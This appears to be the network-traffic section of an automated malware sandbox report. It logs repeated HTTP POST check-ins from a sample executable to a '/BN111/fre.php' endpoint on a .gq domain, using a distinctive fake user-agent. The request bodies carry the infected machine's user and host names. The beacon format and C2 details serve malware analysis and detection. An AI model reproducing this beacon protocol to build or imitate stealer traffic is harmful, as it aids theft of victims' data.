                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      20192.168.2.649801172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:45.343358994 CEST1113OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:45.361588955 CEST1113OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:45.464049101 CEST1114INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CpHKxOLOrpPIM1PF5NEE6vUZ3l5dbYDOl6UNrbCahs5hxC4aJJGhGN7oKjrOL0BSNTAo1uQVbVx5SYG5UeeMMxOeU8B5DsuS3mvrPAdrCRib2ajEVOGtz7to8pV1YDKcBopo%2FKcmdVe3ptFDjf6kWXXiTMwHzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfd76c86440d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      21192.168.2.649802104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:48.039638042 CEST1115OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:48.055685043 CEST1115OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:48.163419962 CEST1116INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xX8MVuCGjS0FNM%2FvuL2BD8nyHgscINdYF2sTG5gdSsMS3%2F808sSrsFsd18a3PVjF22lX8c6mqEJFN4gRhXrpUEkmDty5RH6trK9n7XiwuMhOgsGG0JxWNKvSSmXgx%2F38h9tCGGDosMS%2FwDye9z6hmxb7OGqF0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfe84d3e4309-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      22192.168.2.649803104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:49.659260988 CEST1117OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:49.675806999 CEST1117OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:49.774518013 CEST1118INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3nVDbQqzeq99VtQdxhWX%2Fj7fXtAJV7srTKCv221y2RZh2a%2F8IS0yw3Zf9GABw%2F42RW46cAvIOehRvvP4M6%2FyJSAId%2Bgjb24pBzUjcG3sOSc%2FJAPaXI%2FrScX7pLEjJO5mSc8ztul8%2Bxk3KF3VKTeg%2Fa5igJ67pw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debff26ef15c2c-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      23192.168.2.649804104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:50.976326942 CEST1119OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:50.992428064 CEST1119OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:51.090559006 CEST1120INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sy0tXiUZGLf%2FShCOiRUnNRckJK1ccZE5lquOjWMUouZuuVvcp%2BfhB5GGR1S0BhIE6pVkDFG%2FzmcmHMOfWnDo6YPcj7m3%2FYYbTB4GxN%2BjA6S6jjPL6chZ1jihY6yWnxqgycQOlIXIPvuqEaE1VHcfl3z2NHMvrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debffaaf320621-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      24192.168.2.649805104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:52.327367067 CEST1121OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:52.343465090 CEST1121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:52.449971914 CEST1122INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0%2F0G%2FltPrkYLGxzRCt9VdfNUMtip3rLXsYuFpJSTw2Tm%2Bkk99WneQCuJnmMJyMyxB%2FadH9hc7Nck4D5MaWnJHgR8m%2BeuWRD%2BWW1k6AEiWmmZ9D3wy1JfLuw3Xnsjx%2F97L17z30dxppqVVpdcP7o%2BEMd9GCUKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0031f88c2c7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      25192.168.2.649806172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:53.563440084 CEST1123OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:53.579511881 CEST1123OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:53.674302101 CEST1124INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SNwUQXmpNoSyQjbUBF5l8GTY8SywVTmzZ8AkYzJWy0b1O3O5n7b1dHE%2BpDh78zb6iFJ%2BdNIyBnabgJCYCBp9qDa6TZYlhCr6htZEMFmSRyHaUU%2F5WZkBITRFMBZ70zlWfi%2BTeSLQBR3OnT37qPUC6HdB7R1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec00acb8868e9-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      26192.168.2.649807104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:54.645978928 CEST1125OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:54.661925077 CEST1125OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:54.761792898 CEST1126INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5iKke1AJBJjg1Y4VYs826dmfarUEhJ%2BRldRquW1kfSHN%2F9pyLtsyynuFr6yDn27OBJXeF7xvTdW%2Ft8i1FIp5x0Weuf1lZLtQZXeLjxSzbBGO%2FyFV1amXpr3qEg91BlnrsxMydhByRN7hHp%2FNzcUVzgokqELeaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0119f8505d0-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      27192.168.2.649808172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:56.080095053 CEST1127OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:56.096412897 CEST1128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:56.196356058 CEST1128INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ZERCavJqd%2FSKMbfz%2FCdLS9YwGowXmP6tmsSmcJhamaT8Ait4OW44MSZPDPU0Da0xQWD1O7rujLd4vYbmYz9A17IY8%2BGwpvDcLDsDokZqYZuqyxlqEAsXlvosJbc66ZygTYhi55wxB4l2t2Jm5O0fXdSbA4yjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec01a8bea1f31-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      28192.168.2.649810172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:57.516459942 CEST1131OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:57.532377005 CEST1131OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:57.630285978 CEST1132INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O5KNJiSYA%2FFwVwmEIc9wb3cwwX%2FatGRb1JUO%2Bz%2BO1X6dOTVK5OasGDuojIDlalGExPnvGUgm4%2BBjy6wcTbge3HFAtucsxDcKdwQEvnp1sBeGdfQVSDQonetbCFSY%2BgvOrCkvkI7mREs82y4gLDOZB6jrrwpPJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0238f384df4-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      29192.168.2.649811172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:58.883204937 CEST1133OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:58.899343967 CEST1133OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:59.036413908 CEST1134INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DM7UDqfrOC0u1TfBnQ6rtX30q18tMXbF5JIb91n%2BbGCB6ZdVbFXYS95wCnHdXiccXK3L6LtGQvYayuHRvdRXTsx%2Bp%2F8MP1IOTYSnqgQ1RzzD0YUpci6oZfH4e%2BVOk7%2BgeLA12NXL%2BrdcTTN7OA8MSANsnvfhKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec02c0d56695b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.649782104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:22.592927933 CEST1060OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:22.609401941 CEST1060OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:22.751913071 CEST1061INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rIV1TCFtSps327NCu2VLT4v29yYPaf8k0h8mWGTLoJdR4ctIDPvXYKYGHAiiR70AaLpuz4o3vkmUXm72wLswxeU23M%2BVnkrC6oouZxiAyBfAU%2B7srHMGXyKvERWjs%2FICV8ZBHL3aKPib3xMytSdkecNOp%2BGqKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf493e674e9d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      30192.168.2.649812172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:00.298238039 CEST1135OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:00.314201117 CEST1135OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:00.410363913 CEST1136INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6pzxxxAx7m5C%2BvI0HV9vpq2v%2FMh%2FQtCUhiuQVfVDamOYlWTH%2Fi66M79yyl7xYeat0IDW%2FErpRaBlSviuH6N5w1T51LJh6ilhSkpq5iiAXlGSkcN%2F0RFH%2B4gKfqMyKqrLMrZ%2F9KQlOg0PnfcEYBS9mMuv2oXUEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec034ea085c38-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      31192.168.2.649813172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:01.666924000 CEST1137OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:01.683583975 CEST1137OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:01.827079058 CEST1138INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RwxyEXrfJWD7HzQsJLaaJ4ykrDR%2FXfvMae8i0xj3UPR%2Bl89OWY%2FzFHl6zIsjt3MczmsMNyXqydAx4kl6J4imX5JAkkeop22%2Bp9dS34N1vYjp83Fzoam6oRK%2Bx64oqTTVoWsVbFiS6fNE%2F4OFRWqA4k1a9wK%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec03d7f2c3250-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      32192.168.2.649814104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:03.076479912 CEST1139OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
